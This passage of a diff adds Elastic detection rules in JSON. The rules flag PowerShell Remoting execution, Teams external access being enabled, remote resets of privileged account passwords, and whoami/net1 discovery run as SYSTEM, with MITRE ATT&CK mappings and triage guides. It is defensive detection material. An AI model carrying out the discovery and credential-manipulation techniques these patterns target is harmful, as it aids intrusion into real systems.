"language": "eql", + "license": "Elastic License v2", + "name": "Incoming Execution via PowerShell Remoting", + "query": "sequence by host.id with maxspan = 30s\n [network where host.os.type == \"windows\" and network.direction : (\"incoming\", \"ingress\") and destination.port in (5985, 5986) and\n network.protocol == \"http\" and source.ip != \"127.0.0.1\" and source.ip != \"::1\"]\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"wsmprovhost.exe\" and not process.executable : \"?:\\\\Windows\\\\System32\\\\conhost.exe\"]\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], + "risk_score": 47, + "rule_id": "2772264c-6fb9-4d9d-9014-b416eed21254", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.006", + "name": "Windows Remote Management", + "reference": "https://attack.mitre.org/techniques/T1021/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "2772264c-6fb9-4d9d-9014-b416eed21254_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json new file mode 100644 index 00000000000..c31a3814904 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json new file mode 100644 index 00000000000..447d22cd968 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json new file mode 100644 index 00000000000..f6be1c4a495 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when external access is enabled in Microsoft Teams. External access lets Teams and Skype for Business users communicate with other users that are outside their organization. An adversary may enable external access or add an allowed domain to exfiltrate data or maintain persistence in an environment.", + "false_positives": [ + "Teams external access may be enabled by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Teams External Access Enabled", + "note": "", + "query": "event.dataset:o365.audit and event.provider:(SkypeForBusiness or MicrosoftTeams) and\nevent.category:web and event.action:\"Set-CsTenantFederationConfiguration\" and\no365.audit.Parameters.AllowFederatedUsers:True and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoftteams/manage-external-access" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AllowFederatedUsers", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "27f7c15a-91f8-4c3d-8b9e-1f99cc030a51_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json new file mode 100644 index 00000000000..3d399c3effd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json new file mode 100644 index 00000000000..001be6c13d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 111 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json new file mode 100644 index 00000000000..6b5b8da5b15 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113.json @@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials.", + "false_positives": [ + "Legitimate remote account administration." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-windows.forwarded*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Password Reset Remotely", + "note": "This rule may cause medium to high performance impact due to logic scoping all remote Windows logon activity.", + "query": "sequence by winlog.computer_name with maxspan=1m\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and event.outcome == \"success\" and source.ip != null and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not winlog.event_data.TargetUserName : (\"svc*\", \"PIM_*\", \"_*_\", \"*-*-*\", \"*$\")] by winlog.event_data.TargetLogonId\n /* event 4724 need to be logged */\n [iam where event.action == \"reset-password\" and\n (\n /*\n This rule is very noisy if not scoped to privileged accounts, duplicate the\n rule and add your own naming convention and accounts of interest here.\n */\n winlog.event_data.TargetUserName: (\"*Admin*\", \"*super*\", \"*SVC*\", \"*DC0*\", \"*service*\", \"*DMZ*\", \"*ADM*\") or\n winlog.event_data.TargetSid : (\"S-1-5-21-*-500\", \"S-1-12-1-*-500\")\n )\n ] by winlog.event_data.SubjectLogonId\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724", + "https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/", + "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": false, + "name": "winlog.computer_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetSid", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1531", + "name": "Account Access Removal", + "reference": "https://attack.mitre.org/techniques/T1531/" + } + ] + } + ], + "type": "eql", + "version": 113 + }, + "id": "2820c9c2-bcd7-4d6e-9eba-faf3891ba450_113", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json new file mode 100644 index 00000000000..3b8b46eaba4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_110.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Discovery Command via SYSTEM Account", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (\n process.name : \"whoami.exe\" or\n (\n process.name : \"net1.exe\" and not process.parent.name : \"net.exe\" and not process.args : (\"start\", \"stop\", \"/active:*\")\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json new file mode 100644 index 00000000000..e67a9bf7954 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2856446a-34e6-435b-9fb5-f8f040bfa7ed_111.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Account Discovery Command via SYSTEM Account", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n", + "query": "process where host.os.type == 